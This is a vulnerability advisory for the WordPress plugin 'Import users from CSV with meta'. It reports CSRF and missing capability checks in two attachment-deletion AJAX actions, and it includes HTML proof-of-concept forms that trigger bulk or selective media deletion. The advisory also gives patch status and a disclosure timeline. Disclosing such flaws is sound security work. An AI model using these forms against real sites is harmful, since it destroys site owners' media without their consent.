Import users from CSV with meta [CSRF]
Description
Plugin implements the following AJAX actions:
acui_bulk_delete_attachmentacui_delete_attachment
Both of them are deleting attachments from the website. None of them introduce CSRF prevention controls. This allows an attacker to leverage the CSRF vulnerability in order to delete all or selected media from the infected website.
Since there also are no capabilities checks, any authenticated user could exploit this vulnerability.
PoC
Bulk delete:
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="acui_bulk_delete_attachment">
<button type="submit" value="Submit">Submit</button>
</form>
Selective delete:
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="acui_delete_attachment">
<input type="text" name="attach_id" value="" placeholder="Attachment ID">
<button type="submit" value="Submit">Submit</button>
</form>
Solution
Latest versions are patched regarding the acui_delete_attachment action. acui_bulk_delete_attachment appears to still be vulnerable, though it would only delete CSV files uploaded as attachments.
INFO
- 3 October 2017
- Pan Vag
- codection.com
- wordpress.org
- 1.10.7.1
- WordPress 4.8.1
TIMELINE
- 2017-10-03:
Discovered - 2019-03-17:
No longer valid (fixed in the meanwhile)